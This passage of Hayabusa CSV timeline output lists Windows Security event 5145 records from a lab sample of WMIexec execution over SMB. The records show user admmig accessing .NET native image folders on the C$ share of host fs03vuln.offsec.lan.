0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\88eec28a11e76fffbecf3de79cadf076 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#\d75626a8ff89596aee2cf2c9eb554cbf | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\62095b976d2affb993898b2e9f88c475 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ 
| Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\f39c57237f98d69b4abdc9e3907d8fe7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#\9fd6e8c8110ccd01fd6745507b906c04 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\ec2e3c1e16b1d1427b32d2f2babf99bc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#\a9175ff6a1a8784975c70e9933314ecd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#\c7ef2b5b5fc4335bef3148904cb3f0e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\a5c640ad1645775e93d560f67f3ea1d1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#\865873dc1b8af370b7a314c3c89dcfd0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\9d5a241e9cf3bdb8312058004ea269f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig 
| Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\68828aa1ea98316a22a4d8488267b07b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#\7cb1fc2895121ae7e24841bd0c24b25e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: 
admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\e1349161320cee221fb339c41ab73546 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#\59420f153f7bb0ef6f63e75d08020c8c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\433ad5082c48708eb6acf6fa065c1461 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\87b325b56b362a5d2dca93029c0d75b8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share 
File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#\8078dc8e65f16bfd95c09cce4fe0280e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\54330dabd4f5e29c758461cbbf2a4f34 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\50399e243bf8da1addc23305521efbd9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\174cd66357bfa0b262b0dbd9bd0e64e3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f05e09fe4c0d9354867afe11b4e9db8c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.811 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\89e812888a4e94f1d2bf0da1c4c6ee5b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 
20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\f3228ac51b37737ae2ce1176bbbad2ce | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\cabc62ca2a04f99fe9af65799a727687 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\1617c5f47d154a5d7cf1f53851398006 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\19b334bb62b3c76cfcc7137bb03371c3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
